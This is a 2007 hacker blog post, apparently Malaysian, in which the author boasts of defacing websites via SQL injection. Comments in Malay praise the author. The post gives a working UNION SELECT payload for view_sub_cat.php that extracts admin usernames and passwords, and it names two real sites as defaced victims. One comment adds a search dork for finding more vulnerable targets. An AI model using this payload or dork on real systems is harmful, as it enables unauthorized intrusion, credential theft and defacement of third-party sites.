SQL Injections

Posted by ghimau under
Based from the milworm exploit. I managed to defaced these pages via sql injections.
Changed a bit the sql injections


view_sub_cat.php?cat_id=99%20UNION%20ALL%20SELECT%201,2,concat(,admin_user,::,admin_password,),4%20FROM%20admin_users--


http://www.virtuosoworld.com/



http://bye5.com/indexXXXX.php


Greetz to : t0pP8uZz & xprog

14 comments:

On 2 July 2007 at 11:26 , فيصل said...

oo.. inurl:view_sub_cat.php?cat_id
nice :)

 
On 2 July 2007 at 14:31 , فيصل said...

ni aku wat banner khas utk ko
nak wat lelebih tu.. x da masa lak hehe

 
On 3 July 2007 at 07:55 , ghimau said...

pergh.. tq bro.. tq.. nice graphic :)

 
On 3 July 2007 at 10:29 , viruspadu said...

apa ni en.hakes
nak komen kene approve2 plak
x hakes la mcm ni... takut ke kene komen pedas2 nih hahahaha...
(cuba utk menaikdarahkan en.hakes)

 
On 3 July 2007 at 12:36 , ghimau said...

langkah berhati hati.. yerla skang ni ada org yang jeles kat sy.. kene lah berhati hati.. hahaha

 
On 3 July 2007 at 13:16 , ghimau said...

Ok.. kalau nak komen tak perlu dapat approve dari admin lagi. Menyahut cabaran dari aunty virus :D

 
On 3 July 2007 at 15:52 , UpXiLon said...

mantap ghimau..
harap bole jd anak murid ghimau 1 day..
yeah..

 
On 3 July 2007 at 15:57 , ghimau said...

ceh! aku guna bug dlm milworm jer..
Ni tgh nak carik 0 day sendiri.. barulah ok :)

nice meeting Upxilon

 
On 3 July 2007 at 16:52 , viruspadu said...

tekanannya akuu...

 
On 4 July 2007 at 09:35 , alycia said...

nampak gayanyer en hakes dah melebarkan sayapnyer huhu...

 
On 5 July 2007 at 07:40 , ghimau said...

laskar cita.. sebarkanlah benih-benih cinta.. musnahkanlah virus-virus benci.. virus yg bisa merosakkan jiwa...

 
On 5 July 2007 at 11:02 , alycia said...

wah, cayalah...
en hakes pun jiwang jgk upenyer....

 
On 5 July 2007 at 11:33 , ghimau said...

jiwang, jgn tak jiwang :P

 
On 30 August 2008 at 10:09 , proqrammer said...

Cayalah bro ghimau ni.semoga tercapai apa yg diinginkan selama ini.hack tu hack gak..jgn plak diri sendiri tak terjaga.tgk mcm aku,web kene hack hehehe.buat masa skang ni aku dok rilek2 jer buat bodoe.ada gak hack sekali sekala kat mana2,sampai aku dpt satu yg sgt best.uik ghimau,hang masih guna passwrd yg sama ke?rindu plak dgn kengkawan HM yg dah lama tak jumpa.aku nak aktif balik tak bleh,sbb dimana saja aku berada,..mesti ada org nak jeles dan dajalkan aku.kalu ada kelapangan ada gak ler buat,tg guna nama lain.woih..ghimau,kim slm kat member2 HM k.insyaALLAH,kalu ada rezeki..aku nk pi semenanjung jln2 cr pasal.hehehe..adios!